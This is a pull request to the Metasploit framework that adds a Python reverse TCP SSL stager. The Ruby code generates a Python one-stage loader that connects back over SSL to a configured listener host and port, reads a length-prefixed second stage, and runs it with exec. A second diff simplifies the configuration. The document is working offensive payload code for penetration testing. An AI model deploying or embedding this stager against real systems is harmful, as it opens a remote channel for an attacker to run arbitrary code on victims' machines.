### PR TITLE
Bring Python reverse_tcp_ssl payload upstream

### DIFF
--- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb
+++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -1,0 +1,73 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows/verify_ssl'
+require 'msf/core/payload/python/reverse_tcp'
+
+module Msf
+
+###
+#
+# Complex reverse_tcp payload generation for Python
+#
+###
+
+module Payload::Python::ReverseTcpSsl
+
+  include Msf::Payload::Python
+  include Msf::Payload::Python::ReverseTcp
+  include Msf::Payload::Windows::VerifySsl
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
+                                         datastore['HandlerSSLCert'])
+    conf = {
+      port:        datastore['LPORT'],
+      host:        datastore['LHOST'],
+      retry_count: datastore['ReverseConnectRetries'],
+      ssl:              true,
+      verify_cert_hash: verify_cert_hash
+    }
+
+    generate_reverse_tcp_ssl(conf)
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  def transport_config(opts={})
+    transport_config_reverse_tcp_ssl(opts)
+  end
+
+  def generate_reverse_tcp_ssl(opts={})
+    # Set up the socket
+    cmd  = "import ssl,socket,struct\n"
+    cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
+    cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "s=ssl.wrap_socket(so)\n"
+    cmd << py_send_uuid if include_send_uuid
+    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
+    cmd << "d=s.recv(l)\n"
+    cmd << "while len(d)<l:\n"
+    cmd << "\td+=s.recv(l-len(d))\n"
+    cmd << "exec(d,{'s':s})\n"
+
+    py_create_exec_stub(cmd)
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    conn.put([payload.length].pack("N"))
+  end
+
+end
+
+end
+

--- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb
+++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -1,14 +1,13 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
-require 'msf/core/payload/windows/verify_ssl'
 require 'msf/core/payload/python/reverse_tcp'
 
 module Msf
 
 ###
 #
-# Complex reverse_tcp payload generation for Python
+# Complex reverse_tcp_ssl payload generation for Python
 #
 ###
 
@@ -16,20 +15,14 @@ module Payload::Python::ReverseTcpSsl
 
   include Msf::Payload::Python
   include Msf::Payload::Python::ReverseTcp
-  include Msf::Payload::Windows::VerifySsl
 
   #
   # Generate the first stage
   #
   def generate
-    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                         datastore['HandlerSSLCert'])
     conf = {
       port:        datastore['LPORT'],
-      host:        datastore['LHOST'],
-      retry_count: datastore['ReverseConnectRetries'],
-      ssl:              true,
-      verify_cert_hash: verify_cert_hash
+      host:        datastore['LHOST']
     }
 
     generate_reverse_tcp_ssl(conf)
@@ -43,8 +36,8 @@ module Payload::Python::ReverseTcpSsl
     false
   end
 
-  def transport_config(opts={})
-    transport_config_reverse_tcp_ssl(opts)
+  def supports_ssl?
+    true
   end
 
   def generate_reverse_tcp_ssl(opts={})

--- a/modules/payloads/stagers/python/reverse_tcp_ssl.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_ssl.rb
@@ -1,0 +1,30 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/core/payload/python/reverse_tcp_ssl'
+
+module Metasploit3
+
+  CachedSize = 317
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Python::ReverseTcpSsl
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Python Reverse TCP SSL Stager',
+      'Description'   => 'Reverse Python connect back stager using SSL',
+      'Author'        => ['Ben Campbell', 'RageLtMan'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'Stager'        => {'Payload' => ""}
+      ))
+  end
+
+end


### PR DESCRIPTION
Adds TLS/SSL transport encryption for reverse tcp payloads in
python
